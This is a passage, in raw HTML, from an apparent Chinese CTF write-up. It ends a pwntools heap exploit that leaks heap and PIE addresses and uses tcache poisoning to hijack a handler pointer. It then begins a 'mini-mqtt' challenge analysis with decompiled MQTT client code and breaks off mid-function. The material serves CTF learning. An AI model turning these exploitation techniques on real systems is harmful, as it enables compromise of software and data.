class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;worker.memo&gt; &#39;</span><span class="p">,</span> <span class="n">memo</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">dispatch_async_task</span><span class="p">(</span><span class="n">task_id</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;gateway&gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;9&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;queue.task_id&gt; &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">task_id</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">bootstrap_scheduler</span><span class="p">()</span> <span class="c1"># leak</span> </span></span><span class="line"><span class="cl"><span class="n">inspect_scheduler_queue</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;[task:0] desc=&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">heap_leak</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">r</span><span class="p">(</span><span class="mi">14</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x30560</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span><span class="p">(</span><span class="s1">&#39;heap_leak&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;handler=&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">pie_leak</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">r</span><span class="p">(</span><span class="mi">14</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="mh">0x30a0</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span><span class="p">(</span><span class="s1">&#39;pie_leak&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">allocate_session_tensor</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> <span class="c1"># init</span> </span></span><span class="line"><span class="cl"><span class="n">allocate_session_tensor</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">allocate_session_tensor</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">allocate_session_tensor</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">allocate_session_tensor</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">complete_batch_inference</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">complete_batch_inference</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">complete_batch_inference</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">complete_batch_inference</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">complete_batch_inference</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># tcache poisoning, hijack strict_policy</span> </span></span><span class="line"><span class="cl"><span class="n">patch_session_metadata</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">safe_linking</span><span class="p">(</span><span class="n">heap_leak</span> <span class="o">+</span> <span class="mh">0x30860</span><span class="p">,</span> <span class="n">heap_leak</span> <span class="o">+</span> <span class="mh">0xb0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">allocate_session_tensor</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">provision_worker_profile</span><span class="p">(</span><span class="n">heap_leak</span> <span class="o">+</span> <span class="mh">0x30510</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">provision_worker_profile</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">inspect_scheduler_queue</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">complete_batch_inference</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># tcache poisoning, hijack handler</span> </span></span><span class="line"><span class="cl"><span class="n">patch_session_metadata</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">safe_linking</span><span class="p">(</span><span class="n">heap_leak</span> <span class="o">+</span> <span class="mh">0x30860</span><span class="p">,</span> <span class="n">heap_leak</span> <span class="o">+</span> <span class="mh">0xb0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">allocate_session_tensor</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">provision_worker_profile</span><span class="p">(</span><span class="n">heap_leak</span> <span class="o">+</span> <span class="mh">0x30560</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">provision_worker_profile</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">pie_leak</span> <span class="o">+</span> <span class="mh">0x6750</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">inspect_scheduler_queue</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">dispatch_async_task</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">itr</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="mini-mqtt">mini-mqtt </h2><p>第一次写 mqtt 的题目</p> <h3 id="ida-1">IDA </h3><h4 id="main">main </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="kr">__fastcall</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">envp</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">mqtt_ip</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">argc</span> <span class="o">&lt;=</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">mqtt_ip</span> <span class="o">=</span> <span class="s">&#34;tcp://localhost:9999&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="n">mqtt_ip</span> <span class="o">=</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="n">mqtt_ip</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Using server at %s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">mqtt_ip</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">rc</span> <span class="o">=</span> <span class="nf">MQTTClient_create</span><span class="p">(</span><span class="o">&amp;</span><span class="n">client</span><span class="p">,</span> <span class="n">v5</span><span class="p">,</span> <span class="s">&#34;httpclient&#34;</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">rc</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to create client, return code %d</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">rc</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">rc</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">rc</span> <span class="o">=</span> <span class="nf">MQTTClient_setCallbacks</span><span class="p">(</span><span class="n">client</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">connlost</span><span class="p">,</span> <span class="n">msgarrvd</span><span class="p">,</span> <span class="n">delivered</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">rc</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to set callbacks, return code %d</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">rc</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">rc</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">dword_5028</span> <span class="o">=</span> <span class="mi">20</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">dword_502C</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">rc</span> <span class="o">=</span> <span class="nf">MQTTClient_connect</span><span class="p">(</span><span class="n">client</span><span class="p">,</span> <span class="n">conn_opts</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">rc</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">MQTTClient_subscribe</span><span class="p">(</span><span class="n">client</span><span class="p">,</span> <span class="s">&#34;HTTP&#34;</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">sleep</span><span class="p">(</span><span class="mi">1u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">msgsend</span><span class="p">(</span><span class="s">&#34;200&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;waiting for message</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Failed to connect, return code %d</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">rc</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">rc</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">MQTTClient_destroy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">client</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">rc</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>这是一个客户端程序,服务端呢?自己搭。</p> <p>该客户端订阅了 &ldquo;HTTP&rdquo; topic</p> <p>核心在 <code>rc = MQTTClient_setCallbacks(client, 0, connlost, msgarrvd, delivered);</code></p> <p>其中 msgarrvd 函数是客户端收到 topic 后的响应</p> <h4 id="msgarrvd">msgarrvd </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">msgarrvd</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a2</span><span class="p">,</span> <span class="kt">int</span> <span class="n">a3</span><span class="p">,</span> <span class="kr">__int64</span> <span class="n">a4</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+0h] [rbp-80h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v6</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-74h] </span></span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">v7</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-70h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v8</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-68h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v9</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-58h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s1</span><span class="p">[</span><span class="mi">72</span><span class="p">];</span> <span class="c1">// [rsp+30h] [rbp-50h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v11</span><span class="p">;</span> <span class="c1">// [rsp+78h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v8</span> <span class="o">=</span> <span class="n">a1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="n">a2</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v6</span> <span class="o">=</span> <span class="n">a3</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v11</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v9</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">a4</span> <span class="o">+</span> <span class="mi">16</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">__isoc99_sscanf</span><span class="p">(</span><span class="n">v9</span><span class="p">,</span> <span class="s">&#34;{</span><span class="se">\&#34;</span><span class="s">clientid</span><span class="se">\&#34;</span><span class="s">:</span><span class="se">\&#34;</span><span class="s">%63[^</span><span class="se">\&#34;</span><span class="s">]</span><span class="se">\&#34;</span><span class="s">,&#34;</span><span class="p">,</span> <span class="n">s1</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;httpclient&#34;</span><span class="p">)</span> <span class="p">)</span><span class="c1">// {&#34;clientid&#34;:&#34;hacker&#34;} </span></span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">MQTTClient_freeMessage</span><span class="p">(</span><span class="o">&amp;</span><span class="n">v5</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">MQTTClient_free</span><span class="p">(</span><span class="n">v7</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">http</span><span class="p">(</span><span class="n">v9</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Message arrived&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; topic: %s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">v7</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34; message: %.*s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)(</span><span class="n">v5</span> <span class="o">+</span> <span class="mi">8</span><span class="p">),</span> <span class="o">*</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="p">)(</span><span class="n">v5</span> <span class="o">+</span> <span class="mi">16</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="nf">MQTTClient_freeMessage</span><span class="p">(</span><span class="o">&amp;</span><span class="n">v5</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">MQTTClient_free</span><span class="p">(</span><span class="n">v7</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>由此可见,这道题目需要我们去构造恶意 topic 信息,让客户端在解析信息的过程中回弹 flag 的内容</p> <p>这里还要求 clientid 不为 httpclient ,因为这是他自身的 id</p> <p>然后就套了一层 http 的解析</p> <h4 id="http">http </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span><span class="lnt">191 </span><span class="lnt">192 </span><span class="lnt">193 </span><span class="lnt">194 </span><span class="lnt">195 </span><span class="lnt">196 </span><span class="lnt">197 </span><span class="lnt">198 </span><span class="lnt">199 </span><span class="lnt">200 </span><span class="lnt">201 </span><span class="lnt">202 </span><span class="lnt">203 </span><span class="lnt">204 </span><span class="lnt">205 </span><span class="lnt">206 </span><span class="lnt">207 </span><span class="lnt">208 </span><span class="lnt">209 </span><span class="lnt">210 </span><span class="lnt">211 </span><span class="lnt">212 </span><span class="lnt">213 </span><span class="lnt">214 </span><span class="lnt">215 </span><span class="lnt">216 </span><span class="lnt">217 </span><span class="lnt">218 </span><span class="lnt">219 </span><span class="lnt">220 </span><span class="lnt">221 </span><span class="lnt">222 </span><span class="lnt">223 </span><span class="lnt">224 </span><span class="lnt">225 </span><span class="lnt">226 </span><span class="lnt">227 </span><span class="lnt">228 </span><span class="lnt">229 </span><span class="lnt">230 </span><span class="lnt">231 </span><span class="lnt">232 </span><span class="lnt">233 </span><span class="lnt">234 </span><span class="lnt">235 </span><span class="lnt">236 </span><span class="lnt">237 </span><span class="lnt">238 </span><span class="lnt">239 </span><span class="lnt">240 </span><span class="lnt">241 </span><span class="lnt">242 </span><span class="lnt">243 </span><span class="lnt">244 </span><span class="lnt">245 </span><span class="lnt">246 </span><span class="lnt">247 </span><span class="lnt">248 </span><span class="lnt">249 </span><span class="lnt">250 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">http</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> 